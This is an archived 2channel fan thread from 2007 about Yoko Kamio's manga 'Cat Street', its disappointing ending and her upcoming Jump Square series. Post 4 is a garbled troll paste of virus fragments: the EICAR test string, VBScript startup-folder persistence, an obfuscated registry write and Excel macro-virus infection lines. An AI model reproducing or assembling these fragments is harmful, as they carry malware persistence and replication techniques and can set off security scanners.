2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【花より男子】神尾葉子39【キャットストリート】

1 :花と名無しさん:2007/09/19(水) 22:48:31 ID:???0
花より男子、キャットストリートを語るスレです。
1)ファンサイトなどの話題や個人的中傷などのレスは禁止です。
2)レス900過ぎたら引越し準備、950を踏んだ人が新スレ立てお願いします。
3)煽り・荒らしには反応しない。大人の分別でぐっとこらえてスルーして下さい。
4)お話が盛り上がってもチャット状態にならないよう自粛しましょう。
5)ドラマ話はドラマ板で
 http://ex21.2ch.net/tvd/

前スレ
【キャットストリート】神尾葉子38【花より男子】
http://anime2.2ch.net/test/read.cgi/gcomic/1186669091/901-1000

過去ログ倉庫
http://hanadan.s21.xrea.com/


2 :花と名無しさん:2007/09/19(水) 22:53:16 ID:???O
2ゲト⊂(´∀`⊂⌒`つ≡

3 :花と名無しさん:2007/09/19(水) 23:17:02 ID:???O
>>1
乙です。

友人にコミック借りてからキャット〜にはまり、本誌を読む様になったんですが、ケイトが浩一とくっつくまでがピークで、後はみるみる勢いなくなってしまい、そのまま最終回。
花男より断然好きだったのでちょっとガッカリですorz

4 :花と名無しさん:2007/09/20(木) 00:06:24 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/09/20(木) 00:40:43 ID:???0
もうすぐ7巻でるねー
この巻は毛糸と浩一のラブ巻といっても過言でもないので
買い

6 :花と名無しさん:2007/09/20(木) 18:41:40 ID:???0
>>1
乙です!

>>5
7巻は買うけど、1〜6巻は売却予定…。

7 :花と名無しさん:2007/09/20(木) 23:20:30 ID:xB6oHCchO
キャットストリートの浩一のお姉さんの学校の文化祭の所はうちの付属大学、

エル・リストンはうちの付属短大が背景でビックリしました。


ケイトが川でれいと叫ぶシーンもうちの高校の側です(・∀・)★
読んでて気付いて本当にビックリしました!嬉しすぎでみんなに自慢しました〜

8 :花と名無しさん:2007/09/21(金) 11:31:01 ID:???0
それ凄いねー

9 :花と名無しさん:2007/09/21(金) 15:41:03 ID:???0
過疎ってるね。
キャット連載中、浩一とケイトのいちゃこらが描かれたときの
スレの勢いが嘘のようだ。

10 :花と名無しさん:2007/09/21(金) 20:34:25 ID:???0
キャット連載打ち切りの時の
スレ流れも凄かった。

11 :花と名無しさん:2007/09/22(土) 00:23:42 ID:???O
7巻の表紙、ケイトと紅葉なんだね。8巻は4人かな?

12 :花と名無しさん:2007/09/22(土) 01:55:24 ID:???0
打ち切り って未だに違和感
集英と神尾の円満合意だったと考えちゃ何か問題でもあるんだろか
(強制終了されたんならスクエアに描いてやる義理もあるまいし)
展開的にも山場を越えていい潮時だったというか、渡りに舟だったというか

13 :花と名無しさん:2007/09/22(土) 02:14:18 ID:???0
>>12
神尾さんが一方的にやめさせられた、とか誰一人言ってない訳だが。
連載作品をとっとと見捨てたと叩かれてる訳で。
そりゃ集英と神尾的には円満合意だろうよw

14 :花と名無しさん:2007/09/22(土) 04:13:50 ID:???0
打ち切りって言葉でそれを表すのがヘンだってことだろ
フツーは作者が不本意にやめされられたときに使う言葉だからな
個人的には花男よろしくダラダラ続けられるよりはなんぼかマシ
神尾は終わらせるのがヘタな作家だと割り切れば気にもならん

15 :花と名無しさん:2007/09/22(土) 08:22:25 ID:???0
でも人気作品はカラー最終回が普通だからね。キャットは
位置的にも真ん中ぐらいだったし単行本もそこまでヒットしてた
わけじゃないから、打ち切りエンドありうるけどね〜。
別に売れっ子でも打ち切りは普通にあるし。
ジャンプスクエアの連載話がきて自分で止めたって線もあるだろうけど、
いかんせん別マの中じゃ売り上げや人気は真ん中ぐらいなら、
打ち切られたって言い方もできるよ。

16 :花と名無しさん:2007/09/22(土) 08:51:30 ID:???O
キャット中盤あたりまでは大好きな話だったんだけどなぁ…
終わらせ方の強引さがね。別マの看板てわけでもなかったから仕方ないのかな
個人的にはコーラス向きの話にも思える。てか、最初からコーラスだったらもうちょっと進行ぐあいが違ったかもって気がしてた
(集英社だったよね?>コーラス)

17 :花と名無しさん:2007/09/22(土) 11:11:14 ID:???0
別マのターゲット層の中高生位には退屈な内容だったのかな?

18 :花と名無しさん:2007/09/22(土) 14:02:20 ID:???0
コーラスにしては子供っぽすぎない?
まあ、もう終わってしまったんでどうでもいいけど。

自分にとっては
この話は連載の第一回目が結局、一番、印象的だった。
こんな感じで終わるんだったら荒井さんのエピとか中途半端だし

19 :花と名無しさん:2007/09/22(土) 19:10:36 ID:???0
大人になった時点でコーラス移動すれば良かったのに・・・

もう終わったんだけどね 

20 :花と名無しさん:2007/09/25(火) 10:05:16 ID:z4SEFdfp0
7巻でますよー
表紙がケイトと紅葉だった

21 :花と名無しさん:2007/09/25(火) 13:45:10 ID:???0
ケイトと紅茶かと思った

22 :花と名無しさん:2007/09/25(火) 17:15:28 ID:???0
表紙のケイト別人みたい

23 :花と名無しさん:2007/09/25(火) 19:17:05 ID:???0
6巻までは次は表紙誰だとかカラーは何色だとかで盛り上がってたのにwww
みんな無関心になってる

24 :花と名無しさん:2007/09/25(火) 21:02:27 ID:???0
レスの少なさが物語ってるw>無関心

25 :花と名無しさん:2007/09/25(火) 21:05:22 ID:???0
1〜6巻までをブクオフに売ったお金で7巻を買う予定。
近所のブクオフは1冊150円買い取りだ。

26 :花と名無しさん:2007/09/25(火) 23:57:59 ID:???O
最終巻まで購入するつもりだったけど…

7巻の表紙見て購入意欲が薄れてしまった

27 :花と名無しさん:2007/09/26(水) 03:32:04 ID:???0
7巻柱コメント抜粋
「8巻で最終巻」
「もともと5巻くらいで終わらせようと思っていた」
「思っていたよりも長く続いて、楽しんで描けた」

28 :花と名無しさん:2007/09/26(水) 15:52:54 ID:3ZnTbiPLO
花男の番外編書くって書いてあったねー
やっぱ神尾さんは花男のイメージが強すぎてなんか…

29 :花と名無しさん:2007/09/26(水) 16:53:04 ID:???O
ちょっと悩んだけど浩一好きだから7巻買った。
柱とか読むと元々長期の予定じゃなかったんだね〜。本人的にはこれでも長く続けた方なんだね。
花男より自分は好きだったけど。
つーかライブでメガネ配られる人気アーティストが誰か気になるw

30 :花と名無しさん:2007/09/26(水) 19:04:38 ID:???0
てか裏表紙なにあれ
誰なのあれw

31 :花と名無しさん:2007/09/26(水) 22:34:04 ID:???0
7巻は買おうと思っていたのに、ここ読んでたら
買う気失せてきちゃった(´・ω・`)
もうどうでもいいや。
こうなった以上、花男も見たくない。

32 :花と名無しさん:2007/09/27(木) 00:00:40 ID:???0
みんな例の騒動でテンションさがりまくってるな


柱も正直言い訳臭かった

33 :花と名無しさん:2007/09/27(木) 00:52:35 ID:???O
冷静になって7巻読んだら面白かった。
でも荒井の顔と行動がキモい。自分的には、荒井の話で終わったから後味が悪いんだな〜と思った。
早く終わらせるなら、スクール長死亡エピから上手くまとめれば良かったのに、と思った。

34 :花と名無しさん:2007/09/27(木) 01:01:05 ID:???0
7巻は浩一とケイトラブラブ巻ですよ

35 :花と名無しさん:2007/09/27(木) 09:14:29 ID:???0
迷ったけど7巻買った。
やっぱ浩一はかっこいいな…
急に連載中止じゃなくて予定通りの終わり方だったなら、
終わらせ方が異様に下手だなぁと思う
長く続ける気はなかったけど
正式に終了を決めたのは最近なんじゃないかと思った
途中までは丁寧だから

36 :花と名無しさん:2007/09/27(木) 11:24:13 ID:???O
確かいきなり数年後に飛んだとき、このスレで「もしかして長期連載じゃないんじゃないの?」って話題出たよね。
長く続けようと思えば、スキップビートみたいにドラマとか映画を延々と描けたわけだし。
やっぱり最初からケイトの仕事はほとんどスルーだし、短期の予定だったんだろうね。
でもまとめ方はやっぱり上手くないと思う。

37 :花と名無しさん:2007/09/27(木) 14:42:16 ID:???0
自分は荒井ネタの中途半端さに愕然として、
「伝説の…」みたいな安っぽいラストで決定的に
受け付けなくなった。

38 :花と名無しさん:2007/09/27(木) 15:23:57 ID:???0
もう一生、花男の番外編だけ描いてれば

39 :花と名無しさん:2007/09/27(木) 19:58:23 ID:???0
>>37
かなり同意
荒井編で冷めて伝説の四人で萎えた。
荒井編も花男っぽい展開で嫌いだったけど、ケイトが簡単に許したり荒井と仲良くなったりしなければ
まだよかったのに・・・浩一も彼女が意味不明な理由でボコられたのに簡単に許してるし。
文句ばかりになってしまったけど途中まで大好きな作品だったからこそ本当に残念だ

40 :花と名無しさん:2007/09/27(木) 20:12:06 ID:???0
ほんと荒井編まではよかったのにな
どうしても終わらせたかったなら無理に荒井エピとか入れずに
普通に終わらせた方がまだよかったんじゃないか


41 :700:2007/09/27(木) 21:54:44 ID:???0
7巻買って来た。
あーゆう終わり方をするって知ってるせいか、
今まで読んでいたようにワクドキしながら読めなかったよ…_| ̄|○
浩一と毛糸の恋愛話も何故か( ´_ゝ`)フーンくらいにしか感じることが出来ず、
人間の心って簡単に移り変わるものなのねって感慨深く思ってしまった。

42 :花と名無しさん:2007/09/28(金) 21:55:33 ID:???O
みんな言ってることが同じでねちねちと
いい加減しつこい。


43 :花と名無しさん:2007/09/28(金) 22:17:31 ID:???O
キャット読んだ事なくて今日は古本屋で五巻までかった。
おもしろかった。はやく続き読みたいな。
はなだんよりか好きかも。

44 :花と名無しさん:2007/09/29(土) 00:12:34 ID:???0
>>42
それだけ、みんな失望したんだよ…。
7巻発売したのに、この書き込みの少なさが物語ってるよね。

45 :花と名無しさん:2007/09/29(土) 05:21:27 ID:???O
スクール長のトコはちょっとウルっときた
あの後、浩一とくっついて学園継いで終わりで良かったのに。
荒井のキモさは異常

46 :花と名無しさん:2007/09/29(土) 19:00:46 ID:???O
7巻、普通におもしろかったけど。

47 :花と名無しさん:2007/09/29(土) 20:12:21 ID:???0
>>45
そうだよねー。あそこで終わってたらよい漫画だったって思えたと思う

48 :花と名無しさん:2007/09/29(土) 21:48:49 ID:???0
荒井編は果たして必要だったのか?
あんな話、はっきりいって
不愉快極まりない上に中途半端だし
あんなに簡単に許せるもんじゃないし
和解できないと思うし
全然感情移入できない話だった。
それまでが良かった分もったいない。

49 :花と名無しさん:2007/09/29(土) 23:11:53 ID:???O
荒井はホント後味悪いよ。犯罪者はタイーホしないと。


50 :花と名無しさん:2007/09/30(日) 10:11:52 ID:Ev27yR+K0
何この最終回。。読者の想像に任せる的な終わり方すげーむかつく。

51 :花と名無しさん:2007/09/30(日) 12:37:34 ID:???0
>>50
浩一とケイトのラブラブが全く堪能できなくてもうね…
ガッカリとしか

52 :花と名無しさん:2007/09/30(日) 12:53:46 ID:???0
スクール長が死んでしまうとこは正直ケイトに引いたな
スクール長のこととか関係なく、普通のタイミングで
浩一とラブラブしてくれればよかったのに

53 :花と名無しさん:2007/09/30(日) 18:02:52 ID:???O
そうか?

54 :花と名無しさん:2007/09/30(日) 18:42:12 ID:???0
スクール長が二人結ばせたような感じだけどな
タイミング的にw

55 :花と名無しさん:2007/10/01(月) 22:00:54 ID:???0
http://jumpsq.shueisha.co.jp/contents/kamio/index.html

まつりスペシャル

56 :花と名無しさん:2007/10/01(月) 22:52:42 ID:???0
>>55
大洋とつくしみたいw

57 :花と名無しさん:2007/10/01(月) 23:50:39 ID:???0
>>56
同じくw

58 :花と名無しさん:2007/10/01(月) 23:56:45 ID:???0
「まつりスペシャル」ってタイトルなのか?

59 :花と名無しさん:2007/10/02(火) 01:38:54 ID:???0
>>58
それで決定だろうね。
ジャンプスクエアHPに載せてるし。

60 :花と名無しさん:2007/10/02(火) 02:13:53 ID:???0
え? 太陽じゃねぇの?

61 :花と名無しさん:2007/10/02(火) 07:13:18 ID:???0
浩一顔も出てくるかな
大洋じゃ萌えそうにない


62 :花と名無しさん:2007/10/02(火) 10:20:02 ID:???0
大洋と平野さんかよw

63 :花と名無しさん:2007/10/02(火) 12:09:10 ID:WVT6hTtpO
まつりスペシャル、へんな名前…
たしかに浩一顔じゃなきゃ萌えんわ

64 :花と名無しさん:2007/10/02(火) 13:13:51 ID:???0
主人公、まつりって名前じゃない?ww

65 :花と名無しさん:2007/10/02(火) 13:19:45 ID:???0
>>64
自分もオモタw

大洋顔あんまり萌えられん。というか
神尾さんの場合は髪型だけしか区別できないけどw

そして類・玲顔も出てくるだろうなw

66 :花と名無しさん:2007/10/02(火) 15:59:55 ID:???0
なんか・・・ごっつださいな
まつりスペシャル
また元気いっぱいのつくしモドキの女子高生の恋愛話だろ

67 :花と名無しさん:2007/10/02(火) 16:01:06 ID:???0
>他の追随を許さない、魅力的な登場人物の躍動感と、その精緻なる筆致を見逃すな!!

精緻なる筆致って今までの作品のっどの辺が

68 :花と名無しさん:2007/10/02(火) 16:05:48 ID:???0
遅ればせながら本誌のキャット最終回読んだ。
ちょっとホロリと来たし
思ってたよりキレイに終わっててよかった。


69 :花と名無しさん:2007/10/02(火) 17:13:41 ID:???0
ジャンプに異動するの?
個人的には西門系のキャラも出てほしい

70 :花と名無しさん:2007/10/02(火) 19:21:20 ID:???0
案外、祭りを成功に導く集団の話だったりしてwwww

71 :花と名無しさん:2007/10/02(火) 20:14:28 ID:???0
>>70どこかの商店街の娘の話?

72 :花と名無しさん:2007/10/02(火) 21:01:42 ID:???0
>>70
それいいねwww
おもしろそうwww

73 :花と名無しさん:2007/10/03(水) 00:49:14 ID:MXMhkFfz0
浩一にめっちゃ萌えてたのに。。
終わりなの〜〜?!
なんだよ祭スペシャルって 読まない!絶対に!!

浩一みたいなキャラがいるいい漫画あったら
是非教えてください。そっち読みます・・・

74 :花と名無しさん:2007/10/03(水) 20:17:32 ID:???0
>>70
自分はクニミツの政を思い出したが、まつり違いでそっちのがありげだな

75 :花と名無しさん:2007/10/03(水) 20:45:20 ID:???O
>>70
ちょっwおちゃ噴いた。
なんかツボッた。

76 :花と名無しさん:2007/10/03(水) 21:55:20 ID:???O
脇役でつくしとかケイトとか出てきそう

77 :花と名無しさん:2007/10/04(木) 03:16:30 ID:???0
つーか、花男のスピンオフだろ。

78 :花と名無しさん:2007/10/05(金) 02:03:46 ID:???0
10話くらいで終わりそう・・・


79 :花と名無しさん:2007/10/05(金) 11:29:01 ID:???O
コミックス派だけど今日本誌で最終回立ち読みした。
浩一とケイトの絡みがあんまなくてがっくし。
これは、七巻から最終回の間に浩一とケイトのいちゃこらはあるのですか?


80 :花と名無しさん:2007/10/06(土) 00:41:43 ID:???0
>>その精緻なる筆致を見逃すな!!

ワロタ


81 :花と名無しさん:2007/10/06(土) 12:33:35 ID:???O
>>79
残念ながらあまり…

どうせ終わるならキモい荒井なんて出さないで、幸せなイチャコラだけで終われば良かったのにね。
無駄に登場人物増やしたから、詰め込み感がすごかった気がする。

つーか花男スピンオフが祭りなの?意味不明で読んじゃうかもw

82 :花と名無しさん:2007/10/06(土) 15:26:01 ID:???0
女子高生ものなら、いくらでもそりゃスピンオフできるわな
新境地でここはファンタジーでもかいてみたらどうだ

83 :花と名無しさん:2007/10/06(土) 19:21:31 ID:???O
>>81
まじですか。浩一ケイトにカプもえしてたんで残念です。

たしかに荒井とかいらないですよねー。

84 :花と名無しさん:2007/10/07(日) 02:34:42 ID:???0
まつりスペシャルは、金10TBSドラマ化を見越して書いているだろう。
有る程度連載がたまったらドラマ化で、一気に和月やクレイモアを追い抜いてジャンプスクエアの看板に。



85 :花と名無しさん:2007/10/08(月) 23:35:14 ID:???0
ttp://jp.youtube.com/watch?v=PEfhOgqFZ7o
なんかまったりしてていいなw

86 :花と名無しさん:2007/10/09(火) 23:16:29 ID:???0
5位か・・・。
ttp://books.yahoo.co.jp/ranking/general/all/comics/weekly/index.html

週末の『ランク王国』でどう説明されるんだろうな。

87 :花と名無しさん:2007/10/12(金) 08:14:44 ID:???O
>>84
ちょwww
クレイモアはともかくあの連載陣なめすぎw
神尾嫌いじゃないけど、あそこじゃ無理だろ。
絵なら藤崎や浅田の方がよっぽど綺麗だし話や構成力は武井や和月がいる。
この人は目が肥えた漫画好きが読む雑誌より普通に女の子が読む少女漫画描いてる方が成功すると思う。



88 :花と名無しさん:2007/10/12(金) 09:08:10 ID:???0
同じ顔の見分けつかない絵柄でも、クレイモアの方がずっとマシだ

89 :花と名無しさん:2007/10/13(土) 20:48:08 ID:???0
>>87
武井はいねーよw

90 :花と名無しさん:2007/10/13(土) 21:09:23 ID:???O
ジャンプスクエアが出たら板移動しないといけないのかなあ
別マでもまた描くって予告あったから現状でもいいと思うんだけど、スクエア掲載作の話題がスレチ・板チかどうかを創刊までに決めといた方がよくない?


91 :花と名無しさん:2007/10/14(日) 20:11:47 ID:0OqoqmPH0
ごめん、まったく関係ない話になるけど、自分は花男の原作&ドラマ
ファンなの。キャッツの漫画のすみの方に神尾先生の花男ドラマ秘話
みたいなの書いてあるかな?

92 :花と名無しさん:2007/10/14(日) 20:49:12 ID:???0
>84
まつり=ヒロインの名前?

元気美少女と、冴えない幼馴染との恋愛とか。


93 :花と名無しさん:2007/10/14(日) 21:47:59 ID:???O
キャット7巻の裏表紙の絵が誰か分からん

今までは主要キャラの絵だったような
こんな子供出てきたっけか?まさか秘書?

94 :花と名無しさん:2007/10/15(月) 08:18:40 ID:???0
元気少女はつくしでおなかいっぱいだからな

95 :花と名無しさん:2007/10/15(月) 11:02:57 ID:???0
>>94
同意
だからこそケイトは新鮮で好感持てて、もっとキャットが読みたかったのに
全く空気読めないな…編集も神尾さんも

96 :花と名無しさん:2007/10/15(月) 22:13:29 ID:???0
連載始まるまで、過疎ってるんだろうなー

97 :花と名無しさん:2007/10/15(月) 22:23:56 ID:???O
なにげに男人口多そうだなあw

98 :花と名無しさん:2007/10/15(月) 23:13:15 ID:???O
>>92
絵だと美ってかんじじゃなかったような。
自分は滋みたいなの(つくしとは違う天真爛漫で素直な)に
大洋みたいなのが振り回されるっていうイメージをもった。
完全に自分の予想だけどね。


99 :花と名無しさん:2007/10/16(火) 11:37:58 ID:???0
桜子みたいな主人公キボンヌ

100 :花と名無しさん:2007/10/17(水) 11:20:00 ID:???0
SO公式サイトの神尾(風)? 動画吹いた!
なにあれっw

101 :花と名無しさん:2007/10/17(水) 17:17:31 ID:???0
他の漫画家の動画も何だこりゃ?って感じだなw
あれ全部本人じゃないよね?

102 :花と名無しさん:2007/10/20(土) 23:22:39 ID:???O
今さらながらキャット7巻読みました

浩一が1巻の頃とは別人のようにイケメンになってるんですねw

103 :花と名無しさん:2007/10/21(日) 12:15:28 ID:???0
浩一イケメンになり萌えたのもつかの間・・
オワタ

104 :花と名無しさん:2007/10/21(日) 13:14:53 ID:???O
レス見た感じ7巻以降ケイトと浩一のイチャコラはないみたいですね

残念だけど最終巻を楽しみに待ちます。

105 :花と名無しさん:2007/10/22(月) 21:41:28 ID:???0
6巻までは何回も読み返したのに、あのエンドを知ってしまったからか
7巻は一回しか読んでねぇ・・・
本気でうっぱらおうかと考えてる自分がいる

106 :花と名無しさん:2007/10/23(火) 14:08:38 ID:???O
あたしも、ラストを知ってから読み返すのやめた。
まじで浩一に萌えてたのに…

107 :花と名無しさん:2007/10/23(火) 16:12:03 ID:???0
せめてもう1巻分使って、ケイトと浩一のイチャコラのボリュームを増やして欲しかった。
ただ駆け足でまとめて、状況説明しただけで終了だもんなぁ。

108 :花と名無しさん:2007/10/25(木) 19:18:17 ID:???0
>>104
いちゃこらがないということはない
けど終わらせるにしてももうちょっと
うまく終わらせてほしかったなぁ

109 :花と名無しさん:2007/10/25(木) 20:08:07 ID:???0
最後の方の浩一×ケイトのシーンは
使い古された「ヒロインのまとめモノローグ」ばっかりだったのが泣けた。

110 :花と名無しさん:2007/10/25(木) 21:14:38 ID:???0
ふーん

111 :花と名無しさん:2007/10/25(木) 21:36:42 ID:???0
ケイトと浩一は結婚エンドだけど
どうにも絡みが物足りないorz

112 :花と名無しさん:2007/10/25(木) 21:46:29 ID:???0
>>111
同意

113 :花と名無しさん:2007/10/26(金) 17:26:12 ID:???0
いまさらながら、キャットを読んでみたわけだが
浩一、整形でもしたみたいになってんな
ワロタ

114 :花と名無しさん:2007/10/26(金) 18:35:42 ID:???0
浩一の当初の顔は、それでもかき分けしようと足掻いた跡じゃないの

115 :花と名無しさん:2007/10/27(土) 07:10:07 ID:???0
結婚エンド後が見たかったよなー
同居生活

116 :花と名無しさん:2007/10/28(日) 01:34:56 ID:???O
いつか番外編描いてくれないかな

無理か…数は少なくてもキャットファンはいるのに

117 :花と名無しさん:2007/10/28(日) 06:58:18 ID:???0
浩一は初期は当て馬の予定だったから、
脇役顔にしたけど、本命に変更したから
イケメンにしたんじゃないの?

118 :花と名無しさん:2007/10/28(日) 13:26:07 ID:???O
じゃあ最初は玲とくっつく予定だったのか〜

しかし浩一のズボンの丈が足りてないのが気になったよ

119 :花と名無しさん:2007/10/28(日) 19:16:20 ID:???0
玲でもなかったんじゃ?大洋もいたし
でも浩一が人気でたんだろうね
インパクト強かったし

120 :花と名無しさん:2007/10/28(日) 19:37:06 ID:???0
絶妙なタイミングでのテレパシーだったもんなぁ。
玲も勿論ケイトを励ましてたけど、何というか少女漫画の「テンプレ」気味で
印象や萌えが薄かったんだよな…。
エルリストンに誘ったのは玲だから、普通で言うと玲が相手役っぽいんだけど。

121 :花と名無しさん:2007/10/28(日) 23:48:32 ID:???O
浩一、もっとみたかったなぁ〜
花沢類もそうだけど、神尾さんの書くあーゆー系のキャラに弱い。
残念。
花沢類の番外編ってどんなだろ。

122 :花と名無しさん:2007/10/28(日) 23:54:17 ID:???0
この人の漫画って、性格異常の度合いが高い男とくっつくよな・・・
ゲテモノ喰いなのか

123 :花と名無しさん:2007/10/29(月) 00:34:00 ID:???0
>>122
浩一は性格異常じゃないだろ

124 :花と名無しさん:2007/10/29(月) 02:07:14 ID:???0
浩一かっこよかったのに
最後のとんでもエンドのせいで
魅力がかすんじまったじゃねーか

125 :花と名無しさん:2007/10/29(月) 08:53:25 ID:???0
完全にやっつけエンドだったもんなぁ

126 :花と名無しさん:2007/10/29(月) 16:46:25 ID:???O
ジャンプスクエアの広告にでっかくつくしが載ってるなぁと思ったら
新キャラなの?あれ

127 :花と名無しさん」:2007/10/30(火) 02:04:14 ID:LmLkvfwT0
新キャラだね!
まつりって名前の元気な高校生!
しかし、誰にも言えない秘密がある。
それは、仮面(舞踏会でするような)をつけて……
何かするらしい! なんじゃ…そりゃ…
ジャ○プ情報!

128 :花と名無しさん:2007/10/30(火) 02:19:28 ID:???0
今週のジャンプにSQの特集があるんだけど
祭だけ異様に浮いててこっちが恥ずかしくなる・・・
集英社がこの人をどうしたいのか本当に謎。

普通にマーガとかで連載じゃ駄目なんですかね

129 :花と名無しさん:2007/10/30(火) 05:37:45 ID:???0
中身もきっと祭りスペだけ浮いてるとかなんだろうなぁ
そうそうに打ち切って(切られて?)花男に戻ったりして

130 :花と名無しさん:2007/10/30(火) 08:35:23 ID:???0
短期連載って前かかれてたぞ。来年別マでまた連載するらしい。
別マに前書いてあった。

131 :花と名無しさん:2007/10/30(火) 13:10:12 ID:???0

光GENJI元メンバーを覚醒剤所持で逮捕

10月30日10時23分配信 産経新聞



"赤坂晃容疑者

 覚醒剤を所持していたとして、元人気アイドルグループ「光GENJI」のメンバーで俳優の赤坂晃容疑者(34)が
警視庁大塚署に覚せい剤取締法違反の現行犯で逮捕されていたことが30日、分かった。

「自分で使うために持っていた。今年春ごろから使っていた」と供述しているという。同署で入手先を調べている。
 調べでは、赤坂容疑者は28日未明、東京都豊島区の路上で、覚醒剤1グラムを所持していた。

同署員の職務質問で発覚した。
 赤坂容疑者は昭和61年、ジャニーズ事務所入りし、62年に光GENJIの一員としてデビュー。

同グループは63年に「パラダイス銀河」で日本レコード大賞を受賞している。平成7年にグループ解散後はソロ歌手デビュー。

その後は主に俳優業に重点を置き、舞台やドラマなどに出演していた。

 ジャニーズ事務所は「担当者がいないのでコメントできない」としている。




132 :花と名無しさん:2007/10/30(火) 14:20:59 ID:???0
まつりスペシャルwwww
涙目で戻ってくる姿が目に浮かぶ

133 :花と名無しさん:2007/10/30(火) 15:05:11 ID:???0
>>127
セーラームーンみたいに正義の味方でもしそうな悪寒

134 :花と名無しさん:2007/10/30(火) 18:00:03 ID:???0
>>127
多分、森生まさみの聖はいぱあみたいな感じだと思う

135 :花と名無しさん:2007/10/30(火) 19:32:45 ID:???0
>>130
来年別マに「新作」が載る、ってあっただけじゃなっかったっけ?
連載とは書いてなかった気がする

つーか、正直別マにこなくていいよ
マーガでいいよマーガで

136 :花と名無しさん:2007/10/31(水) 16:58:23 ID:???O
今一気に7巻まで読んだけどマジで面白かった
花男も大好きだったしこの人の書く漫画には琴線がびったり合うみたい

自分も別れエピあったし絶対玲が相手だと思ったけどあれよあれよという間に玲が隅に追いやられ…浩一が…
マーサももっとキーなキャラになってくると思ったが

137 :花と名無しさん:2007/10/31(水) 17:25:39 ID:???O
>>127
舞踏会でするような仮面って武装錬金と被るなあ

138 :花と名無しさん:2007/10/31(水) 21:37:42 ID:???0
自分もまとめて7巻まで読んだけど誘拐の話あたりでホント行き当たりばったりで
まともに話を作れない人だなと思ってみてた
早めに終わって正解だ

139 :花と名無しさん:2007/11/01(木) 00:28:55 ID:???0
花男映画化とか読みきりとか
ジャンプSQ新連載とかで
いろいろ大人の事情があったんだろ
文句ばっか言ってないで察してやれよ

ジャンプSQ早売り読んだけど面白かったぞ
やっぱこの人の描く漫画はいいわ


140 :花と名無しさん:2007/11/01(木) 00:37:05 ID:???0
>>139
>花男映画化とか読みきりとか
>ジャンプSQ新連載とかで

そもそもこれが一番叩かれてる訳で

141 :花と名無しさん:2007/11/01(木) 00:53:46 ID:???0
>>139
そういう事情って、わりとどんな漫画家にでもあるんじゃないの?
好きなときに好きな尺だけ好き勝手描ける人なんていないと思う
それを上手くカバーできなかったのは、
この人の実力がそれまでだったってことでしょ

142 :花と名無しさん:2007/11/01(木) 01:20:51 ID:???0
>>141
それはそうだが、このスレが
あまりにも同じ様な文句のループ続きで
なんだかなーって感じで萎えたからな
それだけみんなキャットが好きだったのかもしれないが

143 :花と名無しさん:2007/11/01(木) 02:23:23 ID:???0
大人の事情って作家よりも編集の方が無理難題言うと思う
担当にもよるけど読者よりも自分の立場を優先したりとかね
それが嫌で他誌に移ったり他社に行ったりしているし
神尾さんて漫画のgdgd展開っぷりを見てると
上手く断われないタイプなのかもしれない

144 :花と名無しさん:2007/11/01(木) 04:35:24 ID:???0
>>139
>>142
分かったようなことを
察してやれよって、読者がなんでいちいち作者・編集の内情まで考えてやる必要があるんだ
読者にとって、どんな漫画であれ、単なる娯楽、エンターテイメント
面白いか面白くないか
楽しめたか否か
読者が判断するのは、そこだろ
で、良い形で作品を完結させるのが、作者の仕事であり、技量だろ
良い仕事と思えなかった読者がそれについて匿名掲示板で苦言を呈すことに何の問題が?

145 :花と名無しさん:2007/11/01(木) 08:04:43 ID:???0
金払って買ってるわけだしな
事情はどうでもいがキャットの最後のやっつけ展開や
花より男子の後半のぐだぐだっぷりで
この人の漫画はもう読みたくなくなった

146 :花と名無しさん:2007/11/01(木) 08:24:24 ID:???0
作品に文句言おうと褒めようとその人の勝手。
個々人、感じ方が違うんだし、気に入らない意見は読み飛ばせばいい。
誰もすべて読めなんて強制してないんだし。
キャットについて、自分は良いとも悪いとも思わなかったけど、
否定的な意見があっても肯定的な意見があってもそんなもんかと
思って見てるよ。

147 :花と名無しさん:2007/11/01(木) 08:31:27 ID:???0
月刊ジャンプSQ総合ネタバレスレッド 創刊号
http://anime2.2ch.net/test/read.cgi/comic/1192369827/

148 :花と名無しさん:2007/11/01(木) 08:33:22 ID:???0
もういい加減やめて欲しい作品はgdgdになっても引き延ばして、
期待してた作品は連載中から新作だの映画だのと言い出して、手抜きっぽく終了。
やっぱこの人の姿勢にはムカつく。

149 :花と名無しさん:2007/11/01(木) 15:53:52 ID:???0
キャット思ったよりつまんなかった

150 :花と名無しさん:2007/11/01(木) 21:37:34 ID:???0
ジャンプSQの漫画流し読みした
戦闘?シーンに失笑
動きのある絵かけないのに何でこんな題材にしたんだ

151 :花と名無しさん:2007/11/01(木) 21:43:30 ID:???0
プロレスだとかって聞いたけどマジかよ

152 :花と名無しさん:2007/11/01(木) 22:44:17 ID:???0
>>149
花男みたいなノリを期待したらそうだろうな

153 :花と名無しさん:2007/11/02(金) 01:59:05 ID:???0
関係あるの?

154 :花と名無しさん:2007/11/02(金) 08:19:34 ID:???O
自分も戦闘シーンに笑った。
ていうか神尾さん絵下手になった?花男28巻あたりの絵は好きだったんだけど。
動きがあるシーンが少なくて気付かなかっただけかもしれないが。


155 :花と名無しさん:2007/11/02(金) 10:52:21 ID:???O
スクエア読んだけど、主人公がつくし以外に見えなかった。

156 :花と名無しさん:2007/11/02(金) 11:52:36 ID:???O
まつり読んだ。静止画ぶりに禿藁w
スポーツものは苦手だから避けてたんじゃなかったのかよ。
いきなりの地雷ぶりに乾杯w

